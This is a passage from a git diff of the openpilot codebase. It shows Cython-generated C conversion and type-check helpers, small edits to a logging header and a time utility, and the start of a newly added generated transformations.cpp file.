__Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ +#if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/common/params_pyx.so b/common/params_pyx.so index 23b862b99..deaae7264 100755 Binary files a/common/params_pyx.so and b/common/params_pyx.so differ diff --git a/common/swaglog.h b/common/swaglog.h index 68b05ed2e..25368501a 100644 --- a/common/swaglog.h +++ b/common/swaglog.h @@ -21,11 +21,11 @@ void cloudlog_te(int levelnum, const char* filename, int lineno, const char* fun #define cloudlog(lvl, fmt, ...) cloudlog_e(lvl, __FILE__, __LINE__, \ __func__, \ - fmt, ## __VA_ARGS__); - + fmt, ## __VA_ARGS__) + #define cloudlog_t(lvl, ...) cloudlog_te(lvl, __FILE__, __LINE__, \ __func__, \ - __VA_ARGS__); + __VA_ARGS__) #define cloudlog_rl(burst, millis, lvl, fmt, ...) \ diff --git a/common/time.py b/common/time.py index 8dac17815..b9da106fd 100644 --- a/common/time.py +++ b/common/time.py @@ -1,3 +1,6 @@ import datetime MIN_DATE = datetime.datetime(year=2023, month=6, day=1) + +def system_time_valid(): + return datetime.datetime.now() > MIN_DATE \ No newline at end of file diff --git a/common/transformations/transformations.cpp b/common/transformations/transformations.cpp new file mode 100644 index 000000000..ce83debf1 --- /dev/null +++ b/common/transformations/transformations.cpp @@ -0,0 +1,15613 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "depends": [ + "common/transformations/coordinates.cc", + "common/transformations/coordinates.hpp", + "common/transformations/orientation.cc", + "common/transformations/orientation.hpp" + ], + "include_dirs": [ + "common/transformations" + ], + "language": "c++", + "name": "common.transformations.transformations", + "sources": [ + "/data/openpilot/common/transformations/transformations.pyx" + ] + }, + "module_name": "common.transformations.transformations" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef 